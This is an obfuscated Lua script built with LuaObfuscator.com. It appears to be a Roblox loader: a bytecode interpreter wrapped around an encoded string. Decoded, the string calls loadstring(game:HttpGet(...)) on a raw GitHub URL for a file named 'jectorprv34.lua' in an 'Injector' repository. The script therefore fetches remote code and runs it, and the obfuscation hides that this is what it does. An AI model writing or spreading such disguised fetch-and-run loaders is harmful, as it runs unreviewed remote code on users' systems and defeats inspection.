--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.9) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then v19=v0(v3(v30,1,1));return "";else local v89=0;local v90;while true do if (v89==0) then v90=v2(v0(v30,16));if v19 then local v121=v5(v90,v19);v19=nil;return v121;else return v90;end break;end end end end);local function v20(v31,v32,v33) if v33 then local v91=(v31/((5 -3)^(v32-(2 -1))))%((3 -1)^(((v33-(2 -1)) -(v32-(620 -(555 + (941 -(282 + 595)))))) + ((2569 -(1523 + 114)) -(771 + 86 + 74)))) ;return v91-(v91%(1 -0)) ;else local v92=(570 -(367 + 201))^(v32-(928 -(214 + 713))) ;return (((v31%(v92 + v92))>=v92) and (1 + 0)) or (0 + 0) ;end end local function v21() local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22() local v35=1065 -(68 + (1830 -833)) ;local v36;local v37;while true do if (v35==1) then return (v37 * (1213 -(892 + 65))) + v36 ;end if (v35==(1270 -(226 + 1044))) then v36,v37=v1(v16,v18,v18 + (8 -6) );v18=v18 + (119 -(32 + 85)) ;v35=1 + 0 ;end end end local function v23() local v38=350 -(87 + 263) ;local v39;local v40;local v41;local v42;while true do if (v38==1) then return (v42 * ((16778348 -(802 + 150)) -(67 + 113))) + (v41 * (48056 + 17480)) + (v40 * (628 -372)) + v39 ;end if (v38==0) then v39,v40,v41,v42=v1(v16,v18,v18 + 3 + 0 );v18=v18 + 4 ;v38=3 -(5 -3) ;end end end local function v24() local v43=0 -0 ;local v44;local v45;local v46;local v47;local v48;local v49;while true do if (v43==(1 + 2 + 0)) then if (v48==(997 -(915 + 82))) then if (v47==((0 + 0) -0)) then return v49 * 0 ;else v48=1 + (772 -(201 + 571)) ;v46=0 -0 ;end elseif (v48==2047) then return ((v47==(1187 -(1069 + 118))) and (v49 * ((2 -1)/0))) or (v49 * NaN) ;end return v8(v49,v48-((3375 -(116 + 1022)) -1214) ) * (v46 + (v47/((1 + 1)^(92 -40)))) ;end if (v43==2) then v48=v20(v45,21 + 0 ,128 -97 );v49=((v20(v45,823 -(368 + 423) )==(3 -2)) and  -((12 + 7) -(10 + 8))) or (3 -2) ;v43=445 -(416 + 26) ;end if (v43==(3 -2)) then v46=1;v47=(v20(v45,1 + 0 ,73 -53 ) * ((3 -1)^(470 -(145 + 293)))) + v44 ;v43=2;end if (v43==(430 -(44 + 386))) then v44=v23();v45=v23();v43=(5280 -3793) -((1857 -(814 + 45)) + (1202 -714)) ;end end end local function v25(v50) local v51;if  not v50 then v50=v23();if (v50==(0 + 0)) then return "";end end v51=v3(v16,v18,(v18 + v50) -(886 -(261 + 624)) );v18=v18 + v50 ;local v52={};for v68=1 -0 , #v51 do v52[v68]=v2(v1(v3(v51,v68,v68)));end return v6(v52);end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v53=(function() return function(v93,v94,v95,v96,v97,v98,v99,v100) local v93=(function() return 0;end)();local v94=(function() return;end)();local v96=(function() return;end)();while true do if (v93==0) then local v112=(function() return 0;end)();local v113=(function() return;end)();while true do if ((1262 -(1091 + 171))==v112) then v113=(function() return 0 + 0 ;end)();while true do if (v113==(3 -2)) then v93=(function() return  #"!";end)();break;end if ((0 -0)~=v113) then else v94=(function() return v95();end)();v96=(function() return nil;end)();v113=(function() return 1;end)();end end break;end end end if ( #">"~=v93) then else if (v94== #"|") then v96=(function() return v95()~=0 ;end)();elseif (v94==2) then v96=(function() return v97();end)();elseif (v94~= #"asd") then else v96=(function() return v98();end)();end v99[v100]=(function() return v96;end)();break;end end return v93,v94,v95,v96,v97,v98,v99,v100;end;end)();local v54=(function() return function(v101,v102,v103) local v104=(function() return 0;end)();local v105=(function() return;end)();while true do if (v104==(374 -(123 + 251))) then v105=(function() return 0 -0 ;end)();while true do if (v105==(698 -(208 + 490))) then local v122=(function() return 0 + 0 ;end)();local v123=(function() return;end)();while true do if (v122~=(0 + 0)) then else v123=(function() return 836 -(660 + 176) ;end)();while true do if (v123~=0) then else v101[v102-#"[" ]=(function() return v103();end)();return v101,v102,v103;end end break;end end end end break;end end end;end)();local v55=(function() return {};end)();local v56=(function() return {};end)();local v57=(function() return {};end)();local v58=(function() return {v55,v56,nil,v57};end)();local v59=(function() return v23();end)();local v60=(function() return {};end)();for v70= #"<",v59 do FlatIdent_8199B,Type,v21,Cons,v24,v25,v60,v70=(function() return v53(FlatIdent_8199B,Type,v21,Cons,v24,v25,v60,v70);end)();end v58[ #"xnx"]=(function() return v21();end)();for v71= #"}",v23() do local v72=(function() return 0;end)();local v73=(function() return;end)();while true do if ((202 -(14 + 188))~=v72) then else v73=(function() return v21();end)();if (v20(v73, #"}", #"{")==(675 -(534 + 141))) then local v117=(function() return 0;end)();local v118=(function() return;end)();local v119=(function() return;end)();local v120=(function() return;end)();while true do if (v117~=(2 + 1)) then else if (v20(v119, #"91(", #"xnx")== #" ") then v120[ #"asd1"]=(function() return v60[v120[ #"0313"]];end)();end v55[v71]=(function() return v120;end)();break;end if (v117==0) then local v125=(function() return 0 + 0 ;end)();local v126=(function() return;end)();while true do if (v125~=(0 + 0)) then else v126=(function() return 0;end)();while true do if (v126~=(1 -0)) then else v117=(function() return 1 -0 ;end)();break;end if (v126~=0) then else v118=(function() return v20(v73,2, #"-19");end)();v119=(function() return v20(v73, #"?id=",6);end)();v126=(function() return 1;end)();end end break;end end end if (v117==(2 -1)) then local v127=(function() return 0;end)();while true do if ((0 + 0)~=v127) then else v120=(function() return {v22(),v22(),nil,nil};end)();if (v118==(0 + 0)) then local v160=(function() return 0;end)();local v161=(function() return;end)();while true do if (v160~=(396 -(115 + 281))) then else v161=(function() return 0 -0 ;end)();while true do if (v161~=(0 + 0)) then else v120[ #"xxx"]=(function() return v22();end)();v120[ #"xnxx"]=(function() return v22();end)();break;end end break;end end elseif (v118== #"/") then v120[ #"19("]=(function() return v23();end)();elseif (v118==(4 -2)) then v120[ #"xxx"]=(function() return v23() -((7 -5)^(883 -(550 + 317))) ;end)();elseif (v118~= #"gha") then else local v181=(function() return 0 -0 ;end)();local v182=(function() return;end)();while true do if (v181~=0) then else v182=(function() return 0 -0 ;end)();while true do if (v182==(0 -0)) then v120[ #"-19"]=(function() return v23() -(2^(301 -(134 + 151))) ;end)();v120[ #"0313"]=(function() return v22();end)();break;end end break;end end end v127=(function() return 1666 -(970 + 695) ;end)();end if (v127~=1) then else v117=(function() return 3 -1 ;end)();break;end end end if ((1992 -(582 + 1408))~=v117) then else if (v20(v119, #":", #" ")~= #"|") then else v120[6 -4 ]=(function() return v60[v120[2 -0 ]];end)();end if (v20(v119,7 -5 ,2)== #",") then v120[ #"91("]=(function() return v60[v120[ #"-19"]];end)();end v117=(function() return 1827 -(1195 + 629) ;end)();end end end break;end end end for v74= #"/",v23() do v56,v74,v28=(function() return v54(v56,v74,v28);end)();end return v58;end local function v29(v62,v63,v64) local v65=v62[1 -(0 + 0) ];local v66=v62[243 -(187 + 54) ];local v67=v62[783 -(162 + 618) ];return function(...) local v75=v65;local v76=v66;local v77=v67;local v78=v27;local v79=1 + 0 ;local v80= -(1 + 0);local v81={};local v82={...};local v83=v12("#",...) -(1 -(0 + 0)) ;local v84={};local v85={};for v106=0 + 0 ,v83 do if (v106>=v77) then v81[v106-v77 ]=v82[v106 + (1637 -(1373 + 263)) ];else v85[v106]=v82[v106 + 1 ];end end local v86=(v83-v77) + (1001 -(451 + 549)) ;local v87;local v88;while true do local v107=0 + 0 ;while true do if ((v107==(2 -1)) or (2992>=4646)) then if (v88<=(9 -3)) then if ((1434<3106) and (v88<=2)) then if ((786<3023) and (v88<=(0 -0))) then v85[v87[1386 -(746 + 638) ]]=v64[v87[2 + 1 ]];elseif (v88>1) then local v133=0 -0 ;local v134;while true do if (v133==(341 -((590 -372) + 123))) then v134=v87[(1697 -(4 + 110)) -((2119 -(57 + 527)) + 46) ];v85[v134]=v85[v134](v13(v85,v134 + 1 + 0 ,v80));break;end end else v85[v87[1 + 1 ]]();end elseif (v88<=4) then if ((v88==3) or (2442<74)) then local v135=v87[(1989 -(41 + 1386)) -(306 + 254) ];local v136,v137=v78(v85[v135](v13(v85,v135 + 1 + 0 ,v87[5 -2 ])));v80=(v137 + v135) -1 ;local v138=1467 -(899 + 568) ;for v162=v135,v80 do v138=v138 + 1 ;v85[v162]=v136[v138];end else local v139=v87[2 + (103 -(17 + 86)) ];local v140=v85[v87[3]];v85[v139 + (2 -(1 + 0)) ]=v140;v85[v139]=v140[v87[607 -(268 + 335) ]];end elseif ((4535==4535) and (v88>(295 -(60 + 230)))) then local v144=0 -0 ;local v145;while true do if ((v144==0) or (3009<=2105)) then v145=v87[574 -(426 + 146) ];v85[v145]=v85[v145](v13(v85,v145 + 1 + 0 ,v80));break;end end else v85[v87[(4222 -2764) -(282 + 1174) ]]=v87[814 -(569 + 242) ];end elseif ((1830<3669) and (v88<=((191 -(122 + 44)) -16))) then if (v88<=(1 + 6)) then do return;end elseif (v88==(1032 -(706 + 318))) then local v148=v87[1253 -(721 + 530) ];local v149,v150=v78(v85[v148](v13(v85,v148 + (1272 -(945 + (562 -236))) ,v87[7 -(12 -8) ])));v80=(v150 + v148) -(1 + 0) ;local v151=700 -(271 + 349 + 80) ;for v165=v148,v80 do v151=v151 + 1 + 0 ;v85[v165]=v149[v151];end else do return;end end elseif (v88<=(1511 -(1408 + 92))) then if (v88>10) then v85[v87[1088 -(461 + 91 + 534) ]]=v87[1291 -(993 + 295) ];else v85[v87[1 + 1 ]]=v64[v87[(2377 -1203) -(418 + (818 -(30 + 35))) ]];end elseif (v88>(5 + 7)) then local v156=0 + 0 ;local v157;local v158;while true do if (v156==(1 + 0)) then v85[v157 + 1 + 0 ]=v158;v85[v157]=v158[v87[533 -(406 + 123) ]];break;end if ((1769 -(1749 + 20))==v156) then v157=v87[1 + 1 ];v158=v85[v87[1325 -(1249 + 73) ]];v156=1 + 0 ;end end else v85[v87[1147 -(321 + 145 + 679) ]]();end v79=v79 + 1 ;break;end if ((v107==(0 -0)) or (1430>=3612)) then v87=v75[v79];v88=v87[(1259 -(1043 + 214)) -1 ];v107=1901 -(106 + 1794) ;end end end end;end return v29(v28(),{},v17)(...);end return v15("LOL!043Q00030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q747047657403573Q00682Q7470733A2Q2F7261772E67697468756275736572636F6E74656E742E636F6D2F62656E6564652Q74616572612F496E6A6563746F722F726566732F68656164732F6D61696E2F6A6563746F7270727633342E6C756100083Q00120A3Q00013Q00120A000100023Q00200D000100010003001205000300044Q0003000100034Q00025Q00022Q000C3Q000100012Q00073Q00017Q00",v9(),...);